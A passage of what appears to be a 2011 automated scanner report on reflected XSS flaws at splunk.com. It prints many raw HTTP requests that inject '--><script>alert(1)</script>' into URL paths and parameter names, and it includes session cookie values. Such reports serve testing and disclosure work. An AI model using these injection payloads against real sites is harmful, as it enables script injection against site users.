GET /page383a8--><script>alert(1)</script>74d4e36369d/company_news HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:44 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:44 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:44 GMT; path=/ ETag: 7b7752b2f3e8d75b49e9f04af08a61991296943964 Last-Modified: Sat, 05 Feb 2011 22:12:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload fe016--><script>alert(1)</script>02751ea29ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/company_newsfe016--><script>alert(1)</script>02751ea29ab HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:12 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.429. http://www.splunk.com/page/company_news [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /page/company_news
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60507--><script>alert(1)</script>01f40883de9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/company_news?60507--><script>alert(1)</script>01f40883de9=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:02 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 7f71e5eaea1054d3cef71548dbdb7d571296943923 Last-Modified: Sat, 05 Feb 2011 22:12:03 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 53470
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload ae83c--><script>alert(1)</script>c2862584a5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pageae83c--><script>alert(1)</script>c2862584a5c/deployments HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:46 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:46 GMT; path=/ ETag: 925be999e0ee197c863067b046f053771296943966 Last-Modified: Sat, 05 Feb 2011 22:12:46 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18335
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 65753--><script>alert(1)</script>185a0eda07b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/deployments65753--><script>alert(1)</script>185a0eda07b HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18226
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload b0685--><script>alert(1)</script>efb9c6194d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /pageb0685--><script>alert(1)</script>efb9c6194d9/events HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:11 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:11 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:11 GMT; path=/ ETag: 2f01dad37b0557e806956818a52abb291296943991 Last-Modified: Sat, 05 Feb 2011 22:13:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18315
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload d1458--><script>alert(1)</script>7fcc47b649c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/eventsd1458--><script>alert(1)</script>7fcc47b649c HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:45 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18196
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.434. http://www.splunk.com/page/events [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/page/events
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 14917--><script>alert(1)</script>2af0474b4f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/events?14917--><script>alert(1)</script>2af0474b4f1=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:12:31 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 2103cb1d26b8a9d2bc9082aecd877a281296943954 Last-Modified: Sat, 05 Feb 2011 22:12:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 34882
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 28e76--><script>alert(1)</script>e6d35decb65 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page28e76--><script>alert(1)</script>e6d35decb65/portal_admin HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:39 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:39 GMT; path=/ ETag: 487008de879a47b141c465fe14cdda001296943959 Last-Modified: Sat, 05 Feb 2011 22:12:39 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload e13c8--><script>alert(1)</script>480a721c753 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page/portal_admine13c8--><script>alert(1)</script>480a721c753 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:13:08 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18232
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 799d3--><script>alert(1)</script>ba4082ebc63 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /page799d3--><script>alert(1)</script>ba4082ebc63/previous_releases HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:06 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:06 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:06 GMT; path=/ ETag: 9b6993c05b5df44787b13ea3a3b84cb31296944047 Last-Modified: Sat, 05 Feb 2011 22:14:07 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18359
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 88d0b--><script>alert(1)</script>8b1623a164f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
